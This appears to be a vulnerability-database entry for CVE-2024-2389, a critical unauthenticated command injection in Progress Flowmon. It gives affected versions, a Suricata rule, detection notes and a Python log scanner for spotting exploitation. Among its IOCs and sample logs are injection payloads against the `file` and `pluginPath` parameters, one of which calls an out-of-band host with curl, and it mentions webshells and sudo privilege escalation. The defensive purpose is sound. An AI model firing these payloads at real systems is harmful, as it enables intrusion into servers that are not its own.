CVE-2024-2389
published 2024-04-02


Priority: P1 96 · Severity: critical · CVSS 3.1 base score: 9.8
Vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
Tags: ITW · EXPLOIT · VulnCheck KEV · Initial access
Exploited in the wild
EPSS: 93.90% (99.8th percentile)
In Flowmon versions prior to 11.1.14 and 12.3.5, an operating system command injection vulnerability has been identified. An unauthenticated user can gain entry to the system via the Flowmon management interface, allowing for the execution of arbitrary system commands.

Affected (4 ranges)

Vendor             Product   Version range          Fixed in
progress           flowmon   < 11.1.14              11.1.14
progress           flowmon   >= 12.0.0, < 12.3.5    12.3.5
progress_software  flowmon   >= 11.X, < 11.1.14     11.1.14
progress_software  flowmon   >= 12.X, < 12.3.5      12.3.5

Detection & IOCs (extracted from sources)

url   /service.pdfs/confluence?lang=en&file=`curl+{{interactsh-url}}`
path  /service.pdfs/confluence
path  /var/www/shtml/

suricata (ET Open rule; uses Suricata sticky-buffer syntax such as http.uri, not Snort 2 modifiers)
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Progress Flowmon OS Command Injection in Service:Pdfs:Confluence Module (CVE-2024-2389)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/service.pdfs/confluence"; fast_pattern; content:"file|3d|"; pcre:"/^[^&]*?(?:\x3b|\x0a|\x60|\x7c|\x24)/R"; reference:url,rhinosecuritylabs.com/research/cve-2024-2389-in-progress-flowmon/; reference:cve,2024-2389; classtype:web-application-attack; sid:2056384; rev:1; metadata:affected_product Progress_Flowmon, attack_target Server, tls_state TLSDecrypt, created_at 2024_10_02, cve CVE_2024_2389, deployment Perimeter, deployment Internal, deployment SSLDecrypt, confidence High, signature_severity Major, tag Exploit, updated_at 2024_10_02, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
  • The exploit targets the `file` or `pluginPath` parameter of the management-interface endpoint `/service.pdfs/confluence`, using command substitution such as $(...) or backticks to achieve blind OS command injection.
  • Command execution is blind (no output is returned); attackers have been observed writing webshells to `/var/www/shtml/` as a post-exploitation step. Monitor that directory for new or modified PHP/web files.
  • The ET rule matches GET requests to `/service.pdfs/confluence` whose `file=` parameter contains a shell metacharacter before the next `&`: semicolon (0x3b), newline (0x0a), backtick (0x60), pipe (0x7c) or dollar sign (0x24). It does not inspect `pluginPath`. Because Suricata's `http.uri` buffer is the normalized (percent-decoded) URI, encoded payloads such as %60 or %24 are still caught there; any log-based check must decode before matching.
  • The Metasploit privilege-escalation module abuses sudo rules on Flowmon that let certain binaries run elevated based on filename, including executing PHP under a specific filename. Monitor for unexpected PHP execution via sudo.
  • Use the Shodan query `Server: Flowmon` to find internet-exposed Flowmon instances for asset discovery and attack-surface monitoring.
  • The Nuclei template confirms exploitation through an out-of-band HTTP callback (interactsh). Detect exploitation attempts by alerting on outbound HTTP/DNS requests from the Flowmon host shortly after requests to `/service.pdfs/confluence`.
  • The Metasploit RCE module targets Flowmon versions before v12.03.02, while NVD and the vendor bulletin give the patched versions as 11.1.14 and 12.3.5. Ensure detection coverage spans all v11.x and v12.x instances below those thresholds.
  • The ET rule (sid:2056384) is tagged `tls_state TLSDecrypt`: when Flowmon is accessed over HTTPS, the rule only fires if the sensor sees decrypted traffic. Without SSL/TLS inspection it will not match.
  • Privilege escalation to root is a separate, chained local exploit (sudo abuse) that applies to Flowmon up to at least version 12.3.5, so instances patched against the RCE may still be vulnerable to local privilege escalation after initial access.
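The detection points above (the rule's metacharacter set, the blind-execution caveat, and out-of-band confirmation) as one worked example: a small Python access-log scanner, added here as an editorial illustration. It is not code from the page's sources, the ET rule or any Flowmon component. It applies the rule's metacharacter set to the percent-decoded `file` and `pluginPath` values of requests to `/service.pdfs/confluence`, then pairs each hit with outbound connections the host made shortly afterwards, which is the same logic the Nuclei interactsh check relies on. The log layout, hostnames, IP addresses and timestamps are constructed for the example; this page does not document Flowmon's own log format.

```python
import re
from datetime import datetime, timedelta
from urllib.parse import unquote_plus

# Endpoint and parameters named in the advisory write-ups and the ET rule (sid:2056384).
VULN_PATH = "/service.pdfs/confluence"
INJECTABLE_PARAMS = ("file", "pluginPath")

# Same metacharacter set as the rule's pcre: ';' (0x3b), newline (0x0a), '`' (0x60), '|' (0x7c), '$' (0x24).
SHELL_META = re.compile(r"[\x3b\x0a\x60\x7c\x24]")

# Combined-log-style access line (constructed layout for this example, not Flowmon's own log format).
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)


def parse_access_line(line):
    """Return the fields of one access-log line, or None if it does not match the layout."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def parse_query(query):
    """Split a raw query string on '&' and percent-decode names and values.
    Done by hand rather than with parse_qsl so that ';' inside a payload is never
    treated as a pair separator (older Python versions did that), which would hide
    exactly the character the rule looks for."""
    pairs = []
    for chunk in query.split("&"):
        if not chunk:
            continue
        name, _, value = chunk.partition("=")
        pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs


def injected_params(target):
    """(param, decoded value) pairs on the vulnerable endpoint whose value carries a shell metacharacter."""
    path, _, query = target.partition("?")
    if path != VULN_PATH:
        return []
    return [(name, value) for name, value in parse_query(query)
            if name in INJECTABLE_PARAMS and SHELL_META.search(value)]


def scan_log(lines):
    """One alert per request to the vulnerable endpoint carrying an injection-shaped parameter."""
    alerts = []
    for line in lines:
        rec = parse_access_line(line)
        if rec is None:
            continue
        hits = injected_params(rec["target"])
        if hits:
            alerts.append({"src": rec["src"], "ts": rec["ts"], "method": rec["method"], "params": hits})
    return alerts


def parse_ts(ts):
    return datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")


def correlate_egress(alerts, egress, window_seconds=30):
    """Pair each alert with outbound connections from the Flowmon host that start within
    window_seconds after the request. Execution is blind, so this egress is the evidence
    that the injected command actually ran (the interactsh callback pattern)."""
    win = timedelta(seconds=window_seconds)
    pairs = []
    for a in alerts:
        t0 = parse_ts(a["ts"])
        for e in egress:
            if t0 <= parse_ts(e["ts"]) <= t0 + win:
                pairs.append((a["src"], e["dst"], a["params"][0][0]))
    return pairs


# Constructed sample data: one benign request, three injection attempts (backtick,
# percent-encoded $(...), percent-encoded ';' in pluginPath via POST), one off-endpoint request.
SAMPLE_LOG = [
    '10.0.0.5 - - [02/Oct/2024:10:01:02 +0000] "GET /service.pdfs/confluence?lang=en&file=report.pdf HTTP/1.1" 200 512',
    '198.51.100.7 - - [02/Oct/2024:10:01:09 +0000] "GET /service.pdfs/confluence?lang=en&file=`curl+http://oob.example/x` HTTP/1.1" 200 0',
    '198.51.100.7 - - [02/Oct/2024:10:01:15 +0000] "GET /service.pdfs/confluence?file=%24(id) HTTP/1.1" 200 0',
    '198.51.100.7 - - [02/Oct/2024:10:01:21 +0000] "POST /service.pdfs/confluence?pluginPath=x%3Bid HTTP/1.1" 200 0',
    '10.0.0.9 - - [02/Oct/2024:10:02:00 +0000] "GET /other?file=a%7Cb HTTP/1.1" 404 0',
]
# Constructed egress record (e.g. from the host's flow or DNS logs): one outbound hit to the callback host.
SAMPLE_EGRESS = [{"ts": "02/Oct/2024:10:01:10 +0000", "dst": "oob.example"}]

if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for a in found:
        print(f"{a['ts']} {a['src']} {a['method']} {a['params']}")
    print("confirmed via egress:", correlate_egress(found, SAMPLE_EGRESS))
```

Unlike the ET rule, the scanner deliberately checks `pluginPath` as well as `file` and does not restrict itself to GET, since a log-side check costs nothing to widen. It catches the percent-encoded payloads only because it decodes first, which is the same reason the network rule depends on Suricata's normalized `http.uri` buffer rather than the raw request line.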

CVSS provenance

NVD (v3.1)   9.8   CRITICAL   CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
VulnCheck    10.0  CRITICAL